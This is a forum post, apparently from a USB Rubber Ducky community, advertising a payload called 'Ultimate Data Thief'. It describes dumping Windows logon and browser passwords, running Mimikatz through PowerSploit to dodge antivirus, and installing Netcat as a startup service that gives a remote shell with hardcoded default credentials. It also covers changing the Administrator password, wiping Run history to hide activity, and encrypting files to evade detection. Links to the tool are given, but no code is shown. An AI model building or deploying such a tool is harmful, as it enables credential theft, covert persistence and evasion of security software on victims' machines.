Search the Community
Showing results for tags 'Save directory listings'.
Ultimate Data Thief (DT) By Lavanoid Volcanic GIVE THE DUCK POWER! Features of this payload: Backup Windows Logon Passwords (Doesn't work on Windows 8.1). Backup saved passwords from Chrome, IE, Firefox etc. Get directory listings of common document paths such as Music, Pictures etc. Init script support, meaning that you can add batch scripts in the "Init" directory so that DT will execute it. Get a visual notification when program has executed (MSG.exe must be integrated in Windows. Usually not available in Windows Home Premium/Home Edition). Get a sound notification when program has executed. This can be configured by editing the configuration file. Verbose logging of backup process. Shut-down,reboot or lock system when program execution has completed. Replace Administrator password every time the program is ran. (Disabled by default) Wipe the "Run" dialogue history so it seems that nothing was ever ran from it. Read a configuration file instead of editing the DT.bat. Configuration file: DT_Configuration.ini Integrated Netcat/Nmap to listen on a port (Used for a remote shell). Thanks Shannon Morse for talking about Netcat so much. Netcat will be installed as a Windows service so it has admin access, and it runs upon Windows startup. Default username and password: Lavanoid (Username), LavanoidVolcanic (Password). Run Mimikatz without AV detection, using PowerSploit to accomplish this - Requested by MB60893. Thank you soooo much MB60893! An internet connection is currently required to run this feature. Listing of workgroups and domains on the local network. Customised NetCat remote command line. Unmount the payload storage once execution of DT has completed. Anything else? Other new things: Edited the Compiler.bat to support SCRIPT_EX.bat Edited the payloads located in Scripts\Payloads Backup IE, Firefox, Opera etc. Cleaner DT.bat file, re-wrote the whole script for the 3rd time. Much more smaller and tidier now. The NetCat Terminal.bat uses a hashing algorithm for the password. Old Terminal.bat configuration files WILL be deleted since they WONT work with the newer version. Other features of this program: Checking of main files located in \Res. Checked with a size verification and Sha1Sum (Sha1Sum used in v2.1+) Re-wrote/Re-writing everything from scratch, with more variables that can be triggered/changed, as well as a major tidy up. Everything is much more cleaner than it was before. Added a "API" as I like to call it; to check files with a Sha1Sum verification. Usage: call :DT_Sha1Sum_Check_Compact "File name/path" "Expected Sha1Sum" In version 2.2, I also added a script that adds a firewall entry for netcat. Why didn't I do that in the first place? No longer need to use SCRIPT_EX.exe. Plans for later versions: Combining all EXE's together then encrypt them to avoid AV. Faster execution. Backup more programs. Add more cool features to show who's boss. Encrypt all the programs located in \Res so AV cant detect them and neither will they have to be stored in a encrypted zip archive. Known issues: Slow at "Backing up" data - this is simply because DT has to extract the required data from a encrypted zip archive. An attempt to avoid AV.Notes: New features are added in my free time. I'm usually busy so patience is most appreciated. Default username and password for the remote netcat login: Username: Lavanoid, Password: LavanoidVolcanic DON'T FORGET TO CHECK THE CONFIGURATION IN DT_Configuration.ini! You can open DT_Configuration.ini in any text editor. I personally use Notepad++ since it makes batch programming seem more fun. Payload (optimized for the 4CAP firmware): Payload (Optimized for the dual duck firmware by having a delay at the start): WANT FASTER EXECUTION? NO PROBLEM! Here's a payload that you can encode to execute DT even faster! I would have integrated it into Installer.bat but Microsoft's batch language is really stupid so it won't write part of the script properly. Faster payload: If you are using a different besides a firmware that waits for a key to be pressed, you may want to set a delay at the start of the above payload. I recommend DELAY 15000. This payload requires extra data to dump information, so you need to download all the files in the link below. Download the zip file and extract it on your desktop, then run the "Installer.bat". The installer will ask you questions to help you configure the duck and the payload. Once installed, you can re-insert the duck and the payload will be ready. Recommended Ducky Firmware: 4CAP - I recommend this firmware because Windows can take its time installing drivers (especially netbook's), so if Windows exceeds the delay time by installing drivers, then it wouldn't matter because as soon as you know that the drivers are installed - just press Caps lock 4 times. No time wasted :D . DOWNLOADS! Link to 4CAP: Here Payload and data dumping programs: Here (Dropbox) or Here (Github) Have fun! Disclaimer (a typical one) - I'm not responsible for any turn out. If you run this payload or any of the other programs included within the zip archive - then you accept FULL responsibility. I highly doubt that this payload and the programs will damage your system, but a disclaimer is always good to reassure developers. WARNING! For those of you who are upgrading from 2.4 to 2.5 - remove the NetCat.bat file located in Data\Init as the installer has been integrated into DT.bat REMEMBER: EDIT THE CONFIGURATION FILE BEFORE EXECUTING THIS PAYLOAD! GREAT NEWS!! I've been reviewing some of the code for DT and I've decided to make it even better. I've already made a lot of changes to the DT.bat and NetCat Terminal.bat BUT I'M NOT FINISHED! I'M JUST GETTING STARTED! Why not let the duck disable all other HID devices? I've already found some great programs that will allow me to accomplish this, now I just have to write the scripts! Unfortunately, I'm running Ubuntu (latest version) so since I am not running Windows, I am not able to execute my goals of making this payload better. I could write the script using text editors installed on Ubuntu but it just isn't the same as writing with Notepad++, neither can I test it afterwards. PATIENCE IS THE ESSENCE! My goal is to bring you the best payload possible! I wan't as many features as possible! I would really appreciate it if you leave a comment! Every comment counts (Negative comments are NOT appreciated however)